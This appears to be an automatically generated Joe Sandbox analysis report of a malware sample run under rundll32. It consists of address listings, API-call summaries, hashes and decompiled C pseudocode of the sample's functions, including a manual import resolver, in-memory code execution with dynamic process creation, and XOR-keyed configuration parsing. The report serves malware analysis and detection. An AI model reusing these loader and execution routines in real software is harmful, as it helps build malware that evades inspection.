                                          0x0408ae04
                                          0x0408ae07
                                          0x0408ae0a
                                          0x0408ae0f
                                          0x0408ae1e
                                          0x00000000
                                          0x0408ae24
                                          0x0408ae2e
                                          0x0408ae38
                                          0x0408ae3d
                                          0x0408ae3f
                                          0x0408ae49
                                          0x0408ae4c
                                          0x0408ae4f
                                          0x0408ae55
                                          0x0408ae57
                                          0x0408ae57
                                          0x0408ae5a
                                          0x0408ae5d
                                          0x0408ae62
                                          0x0408ae66
                                          0x0408ae79
                                          0x0408ae7b
                                          0x0408af23
                                          0x0408af23
                                          0x0408af2a
                                          0x0408af2d
                                          0x0408af37
                                          0x0408af37
                                          0x0408af3b
                                          0x0408afb9
                                          0x0408afbc
                                          0x0408afbe
                                          0x0408afbe
                                          0x0408afc5
                                          0x0408afc7
                                          0x0408afd1
                                          0x0408afd4
                                          0x0408afd7
                                          0x0408afd7
                                          0x00000000
                                          0x0408af3d
                                          0x0408af40
                                          0x0408af6e
                                          0x0408af78
                                          0x0408af7c
                                          0x0408af84
                                          0x0408af87
                                          0x0408af8e
                                          0x0408af98
                                          0x0408af98
                                          0x0408af9c
                                          0x0408afa1
                                          0x0408afb0
                                          0x0408afb6
                                          0x0408afb6
                                          0x0408af9c
                                          0x00000000
                                          0x0408af47
                                          0x0408af4a
                                          0x0408af52
                                          0x0408af67
                                          0x0408af6c
                                          0x00000000
                                          0x00000000
                                          0x0408af6c
                                          0x00000000
                                          0x0408af52
                                          0x0408af40
                                          0x0408af3b
                                          0x0408ae81
                                          0x0408ae88
                                          0x0408ae98
                                          0x0408aea1
                                          0x0408aea5
                                          0x0408aee8
                                          0x0408aef4
                                          0x0408af1d
                                          0x0408aef6
                                          0x0408aefa
                                          0x0408af00
                                          0x0408af08
                                          0x0408af0a
                                          0x0408af0d
                                          0x0408af13
                                          0x0408af15
                                          0x0408af15
                                          0x0408af08
                                          0x0408aefa
                                          0x00000000
                                          0x0408aef4
                                          0x0408aead
                                          0x0408aeb0
                                          0x0408aeb7
                                          0x0408aec7
                                          0x0408aeca
                                          0x0408aeda
                                          0x00000000
                                          0x0408aee0
                                          0x0408aec1
                                          0x0408aec5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0408aec5
                                          0x0408ae92
                                          0x0408ae96
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0408ae96
                                          0x0408ae6f
                                          0x0408ae73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0408AE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 0408AE9B
                                          • GetLastError.KERNEL32 ref: 0408AEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0408AEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: 0989531e314af3d7f22b7e69136096ceb6354b87cc0d6be32bb3dcd1f6120e93
                                          • Instruction ID: 0db36dc1ac8af70b3935f7cf4d02c3a136fe2297bb600838dc3ac8b66f189b4d
                                          • Opcode Fuzzy Hash: 0989531e314af3d7f22b7e69136096ceb6354b87cc0d6be32bb3dcd1f6120e93
                                          • Instruction Fuzzy Hash: EF8128B1A00605AFDB51DF98DA80BAEB7F5EF48310F14812EE985E7641E774E905CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040830FC, Relevance: 15.1, APIs: 10, Instructions: 102stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 56%
                                          			E040830FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0x408d33c; // 0x4c89bb0
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E04089810(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0x408c19c;
				}
				_t44 = E040847E1(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E040858BE(lstrlenW(0x408eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x408eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0x408d2a4; // 0xbfa5a8
						_t73 =  *0x408d11c; // 0x408abc9
						_t18 = _t75 + 0x408eb38; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E040858BE(lstrlenW(0x408ec58) + _a8 + _t57 + _t58 + lstrlenW(0x408ec58) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E0408147E(_v16);
						} else {
							_t64 =  *0x408d2a4; // 0xbfa5a8
							_t31 = _t64 + 0x408ec58; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E0408147E(_v8);
				}
				return _v20;
			}


























                                          0x040830fc
                                          0x04083104
                                          0x0408310a
                                          0x0408311a
                                          0x0408311d
                                          0x04083122
                                          0x04083127
                                          0x04083129
                                          0x04083129
                                          0x04083132
                                          0x04083137
                                          0x0408313c
                                          0x04083142
                                          0x0408314c
                                          0x04083155
                                          0x0408315c
                                          0x0408316a
                                          0x0408317c
                                          0x04083181
                                          0x04083186
                                          0x0408318f
                                          0x04083198
                                          0x040831a1
                                          0x040831af
                                          0x040831b7
                                          0x040831bc
                                          0x040831bf
                                          0x040831ca
                                          0x040831e1
                                          0x040831e5
                                          0x04083218
                                          0x040831e7
                                          0x040831ea
                                          0x040831f2
                                          0x040831fd
                                          0x04083205
                                          0x0408320d
                                          0x04083211
                                          0x04083211
                                          0x040831e5
                                          0x04083220
                                          0x04083225
                                          0x0408322c

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04083111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 0408314C
                                          • lstrlen.KERNEL32(?), ref: 04083155
                                          • lstrlen.KERNEL32(00000000), ref: 0408315C
                                          • lstrlenW.KERNEL32(80000002), ref: 0408316A
                                          • lstrlenW.KERNEL32(0408EB38), ref: 04083173
                                          • lstrlen.KERNEL32(?), ref: 040831B7
                                          • lstrlen.KERNEL32(?), ref: 040831BF
                                          • lstrlenW.KERNEL32(?), ref: 040831CA
                                          • lstrlenW.KERNEL32(0408EC58), ref: 040831D3
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: 3d20a6abbd3e08312fb70f2689d6bae969a0ac2189d19fb70aa0fdadd4fd7917
                                          • Instruction ID: 194f336cbd4a6932f556330393831bf09120db0e0232eb11393fe61e5cab3eb6
                                          • Opcode Fuzzy Hash: 3d20a6abbd3e08312fb70f2689d6bae969a0ac2189d19fb70aa0fdadd4fd7917
                                          • Instruction Fuzzy Hash: 73313772D0021AEBDF01AFA4CE449DEBBB5EF44358B158069E944BB211DB39EA11DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005115C2, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104librarystringloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E005115C2(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62);
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}
























                                          0x005115cb
                                          0x005115d1
                                          0x005115d6
                                          0x005115db
                                          0x005116dc
                                          0x005116e1
                                          0x005116e1
                                          0x005115e2
                                          0x005115e5
                                          0x005115e8
                                          0x005115ed
                                          0x005116db
                                          0x00000000
                                          0x005116db
                                          0x005115f4
                                          0x005115f4
                                          0x005115f8
                                          0x005115fe
                                          0x00511603
                                          0x00000000
                                          0x00000000
                                          0x00511609
                                          0x00511618
                                          0x0051161d
                                          0x0051161f
                                          0x00511622
                                          0x00511627
                                          0x00511633
                                          0x00511633
                                          0x00511636
                                          0x0051163a
                                          0x005116c0
                                          0x005116c0
                                          0x005116c3
                                          0x005116c6
                                          0x005116cb
                                          0x00000000
                                          0x00000000
                                          0x005116da
                                          0x00000000
                                          0x005116da
                                          0x00511644
                                          0x00511647
                                          0x00000000
                                          0x00511649
                                          0x00511649
                                          0x00511652
                                          0x00511667
                                          0x00511669
                                          0x00511660
                                          0x00511660
                                          0x00511660
                                          0x0051164b
                                          0x0051164b
                                          0x0051164b
                                          0x0051166c
                                          0x0051166c
                                          0x00511671
                                          0x00511673
                                          0x00511673
                                          0x0051167b
                                          0x00511681
                                          0x00511686
                                          0x00000000
                                          0x00000000
                                          0x0051168a
                                          0x0051168c
                                          0x0051169a
                                          0x0051169f
                                          0x0051169f
                                          0x005116a8
                                          0x005116ab
                                          0x005116ae
                                          0x005116b2
                                          0x00000000
                                          0x005116b4
                                          0x005116bd
                                          0x005116bd
                                          0x00000000
                                          0x005116bd
                                          0x005116b6
                                          0x005116b6
                                          0x00000000
                                          0x005116b6
                                          0x00511629
                                          0x0051162d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0051162d
                                          0x005116d3
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemset$AddressLibraryLoadProc
                                          • String ID: ~
                                          • API String ID: 1986585659-1707062198
                                          • Opcode ID: a5954790d0c361c0c0f714926053e0664c8e4c51bceab332145a0c26e5ee4ff6
                                          • Instruction ID: 0dbdc59b930664e4b39991f94961cec4c493214da5eb40e0cf7fc9ec9d432edd
                                          • Opcode Fuzzy Hash: a5954790d0c361c0c0f714926053e0664c8e4c51bceab332145a0c26e5ee4ff6
                                          • Instruction Fuzzy Hash: 9731C5B5A00A16DBEF10CF15C894BEEBBB4BF54340F2541ADEA05DB600D731EA85CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04081493, Relevance: 12.1, APIs: 8, Instructions: 110librarymemoryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E04081493(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t57;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;

				_t1 = __eax + 0x14; // 0x74183966
				_t67 =  *_t1;
				_t36 = E040857D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
				_t39 = _v12(_v12);
				_v8 = _t39;
				if(_t39 == 0 && ( *0x408d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t46 =  *0x408d2a4; // 0xbfa5a8
					_t18 = _t46 + 0x408e3e6; // 0x73797325
					_t66 = E040877E6(_t18);
					if(_t66 == 0) {
						_v8 = 8;
					} else {
						_t49 =  *0x408d2a4; // 0xbfa5a8
						_t19 = _t49 + 0x408e747; // 0x4c88cef
						_t20 = _t49 + 0x408e0af; // 0x4e52454b
						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t69 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E0408684E();
							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E0408684E();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x408d238, 0, _t66);
					}
				}
				_t68 = _v16;
				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
				E0408147E(_t68);
				goto L12;
			}



















                                          0x0408149b
                                          0x0408149b
                                          0x040814aa
                                          0x040814b1
                                          0x040814b6
                                          0x040815c6
                                          0x040815cd
                                          0x040815cd
                                          0x040814c5
                                          0x040814d0
                                          0x040814d3
                                          0x040814d8
                                          0x040814ed
                                          0x040814f3
                                          0x040814f4
                                          0x040814f7
                                          0x040814fd
                                          0x04081500
                                          0x04081505
                                          0x0408150d
                                          0x04081519
                                          0x0408151d
                                          0x040815ad
                                          0x04081523
                                          0x04081523
                                          0x04081528
                                          0x0408152f
                                          0x04081543
                                          0x04081547
                                          0x04081596
                                          0x04081549
                                          0x0408154a
                                          0x04081551
                                          0x0408156a
                                          0x0408156c
                                          0x04081570
                                          0x04081577
                                          0x04081591
                                          0x04081579
                                          0x04081582
                                          0x04081587
                                          0x04081587
                                          0x04081577
                                          0x040815a5
                                          0x040815a5
                                          0x0408151d
                                          0x040815b4
                                          0x040815bd
                                          0x040815c1
                                          0x00000000

                                          APIs
                                            • Part of subcall function 040857D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,040814AF,?,?,?,?,00000000,00000000), ref: 040857FD
                                            • Part of subcall function 040857D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 0408581F
                                            • Part of subcall function 040857D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04085835
                                            • Part of subcall function 040857D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0408584B
                                            • Part of subcall function 040857D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04085861
                                            • Part of subcall function 040857D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04085877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 040814C5
                                          • memset.NTDLL ref: 04081500
                                            • Part of subcall function 040877E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0408333A,73797325), ref: 040877F7
                                            • Part of subcall function 040877E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04087811
                                          • GetModuleHandleA.KERNEL32(4E52454B,04C88CEF,73797325), ref: 04081536
                                          • GetProcAddress.KERNEL32(00000000), ref: 0408153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 040815A5
                                            • Part of subcall function 0408684E: GetProcAddress.KERNEL32(36776F57,0408935F), ref: 04086869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04081582
                                          • CloseHandle.KERNEL32(?), ref: 04081587
                                          • GetLastError.KERNEL32(00000001), ref: 0408158B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: e8ab326e84a6e25a14fa796f526f320e8efc8e4dc05b5c99aac422443e33ff04
                                          • Instruction ID: fcb8616c7f5b99b2e344333f92811ef7816d1791fcf6faa63d4ef567f0e267cf
                                          • Opcode Fuzzy Hash: e8ab326e84a6e25a14fa796f526f320e8efc8e4dc05b5c99aac422443e33ff04
                                          • Instruction Fuzzy Hash: 50313272800219EFEB10BFA4DE88DDEBBB8EF04354F004569E586B7150D735AE459B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04084D2C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E04084D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x408d2a4; // 0xbfa5a8
				_t1 = _t9 + 0x408e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E04086027(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E040858BE(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04086F33(_t34, _t41, _a8);
						E0408147E(_t41);
						_t42 = E04084759(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E0408147E(_t36);
							_t36 = _t42;
						}
						_t43 = E04084858(_t36, _t33);
						if(_t43 != 0) {
							E0408147E(_t36);
							_t36 = _t43;
						}
					}
					E0408147E(_t28);
				}
				return _t36;
			}














                                          0x04084d2c
                                          0x04084d2f
                                          0x04084d30
                                          0x04084d38
                                          0x04084d3f
                                          0x04084d46
                                          0x04084d4a
                                          0x04084d50
                                          0x04084d57
                                          0x04084d5c
                                          0x04084d6e
                                          0x04084d72
                                          0x04084d76
                                          0x04084d7c
                                          0x04084d81
                                          0x04084d91
                                          0x04084d93
                                          0x04084daa
                                          0x04084dae
                                          0x04084db1
                                          0x04084db6
                                          0x04084db6
                                          0x04084dbf
                                          0x04084dc3
                                          0x04084dc6
                                          0x04084dcb
                                          0x04084dcb
                                          0x04084dc3
                                          0x04084dce
                                          0x04084dce
                                          0x04084dd9

                                          APIs
                                            • Part of subcall function 04086027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04084D46,253D7325,00000000,00000000,74ECC740,?,?,040852FE,?), ref: 0408608E
                                            • Part of subcall function 04086027: sprintf.NTDLL ref: 040860AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,040852FE,?,04C895B0), ref: 04084D57
                                          • lstrlen.KERNEL32(?,?,?,040852FE,?,04C895B0), ref: 04084D5F
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • strcpy.NTDLL ref: 04084D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 04084D81
                                            • Part of subcall function 04086F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04084D90,00000000,?,?,?,040852FE,?,04C895B0), ref: 04086F4A
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,040852FE,?,04C895B0), ref: 04084D9E
                                            • Part of subcall function 04084759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04084DAA,00000000,?,?,040852FE,?,04C895B0), ref: 04084763
                                            • Part of subcall function 04084759: _snprintf.NTDLL ref: 040847C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 137d095f75d42917c3a58f174cacabd86b52281df0779258dbb494ee0396d68a
                                          • Instruction ID: ab14b9f74d9610a2ab056dfeca13737a4fffbe1403c8f31291ce26c28aab5f6e
                                          • Opcode Fuzzy Hash: 137d095f75d42917c3a58f174cacabd86b52281df0779258dbb494ee0396d68a
                                          • Instruction Fuzzy Hash: 001177739012297766227BB49E84CAF3AADDF456AC305451DF584BB240DB38ED0297A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040898F7, Relevance: 9.2, APIs: 6, Instructions: 187memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E040898F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				signed int _t18;
				signed int _t23;
				void* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t41;
				void* _t43;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t54;
				signed int _t58;
				signed int _t62;
				signed int _t66;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t80 = __edi;
				_t72 = __ecx;
				_t69 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x408d2a0; // 0x59935a40
				if(E040896D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
					 *0x408d2d0 = _v12;
				}
				_t23 =  *0x408d2a0; // 0x59935a40
				if(E040896D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
					_t28 = 2;
					return _t28;
				} else {
					_push(_t69);
					_t70 = _v12;
					_push(_t83);
					_push(_t80);
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t66 =  *0x408d2a0; // 0x59935a40
						_t29 = E040810CA(_t72, _t70, _t66 ^ 0x48b4463f);
					}
					if(_t29 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0x408d240 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t62 =  *0x408d2a0; // 0x59935a40
						_t30 = E040810CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
					}
					if(_t30 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0x408d244 = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t58 =  *0x408d2a0; // 0x59935a40
						_t31 = E040810CA(_t72, _t70, _t58 ^ 0x01dd0365);
					}
					if(_t31 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x408d248 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t54 =  *0x408d2a0; // 0x59935a40
						_t32 = E040810CA(_t72, _t70, _t54 ^ 0x3cf823ca);
					}
					if(_t32 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x408d004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t50 =  *0x408d2a0; // 0x59935a40
						_t33 = E040810CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
					}
					if(_t33 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x408d02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t46 =  *0x408d2a0; // 0x59935a40
						_t34 = E040810CA(_t72, _t70, _t46 ^ 0x163b337e);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t43 = 0x10;
						_t44 = E0408A2EF(_t43);
						if(_t44 != 0) {
							_push(_t44);
							E04089B10();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t41 =  *0x408d2a0; // 0x59935a40
						_t35 = E040810CA(_t72, _t70, _t41 ^ 0x89f501b6);
					}
					if(_t35 != 0 && E0408A2EF(0, _t35) != 0) {
						_t86 =  *0x408d324; // 0x4c895b0
						E04084C3A(_t86 + 4, _t39);
					}
					HeapFree( *0x408d238, 0, _t70);
					return 0;
				}
			}





























                                          0x040898f7
                                          0x040898f7
                                          0x040898f7
                                          0x040898f7
                                          0x040898fa
                                          0x040898fb
                                          0x040898fc
                                          0x04089916
                                          0x04089924
                                          0x04089924
                                          0x04089929
                                          0x04089943
                                          0x04089ad2
                                          0x04089ad4
                                          0x04089949
                                          0x04089949
                                          0x0408994a
                                          0x0408994d
                                          0x0408994e
                                          0x04089953
                                          0x04089969
                                          0x04089955
                                          0x04089955
                                          0x04089962
                                          0x04089962
                                          0x04089973
                                          0x04089975
                                          0x0408997f
                                          0x04089984
                                          0x04089984
                                          0x0408997f
